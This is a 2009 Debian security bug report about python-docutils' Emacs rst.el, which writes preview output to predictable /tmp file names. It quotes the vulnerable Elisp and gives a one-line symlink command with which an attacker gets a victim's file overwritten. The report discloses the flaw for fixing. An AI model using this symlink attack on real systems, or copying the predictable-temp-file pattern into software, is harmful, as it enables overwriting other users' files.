Secure testing team - Dec 2009 - Bug#560755: python-docutils: insecure use of temporary files

Package: python-docutils
Version: 0.5-2
Severity: grave
Tags: security help
Justification: user security hole

Emacs major mode for reStructuredText (rst.el) uses temporary files
with predictable names in an insecure fashion:

| (defun rst-compile-pdf-preview ()
|   "Convert the document to a PDF file and launch a preview program."
|   (interactive)
|   (let* ((tmp-filename "/tmp/out.pdf")
|          (command (format "%s %s %s && %s %s"
|                           (cadr (assq ''pdf rst-compile-toolsets))
|                           buffer-file-name tmp-filename
|                           rst-pdf-program tmp-filename)))
|     (start-process-shell-command "rst-pdf-preview" nil command)
|     ;; Note: you could also use (compile command) to view the compilation
|     ;; output.
|     ))
[...]
| (defun rst-compile-slides-preview ()
|   "Convert the document to an S5 slide presentation and launch a preview
program."
|   (interactive)
|   (let* ((tmp-filename "/tmp/slides.html")
|          (command (format "%s %s %s && %s %s"
|                           (cadr (assq ''s5 rst-compile-toolsets))
|                           buffer-file-name tmp-filename
|                           rst-slides-program tmp-filename)))
|     (start-process-shell-command "rst-slides-preview" nil command)
|     ;; Note: you could also use (compile command) to view the compilation
|     ;; output.
|     ))

How to reproduce/exploit this bug
---------------------------------

Attacker:
$ ln -sf /path/to/file/the/attacker/want/to/overwrite /tmp/slides.html

Victim:
$ emacs foo.rst
M-x rst-mode
C-c 5

-- 
Jakub Wilk
-------------- next part --------------
A non-text attachment was scrubbed...
Name: not available
Type: application/pgp-signature
Size: 836 bytes
Desc: Digital signature
URL:
<http://lists.alioth.debian.org/pipermail/secure-testing-team/attachments/20091211/56c10a6a/attachment.pgp>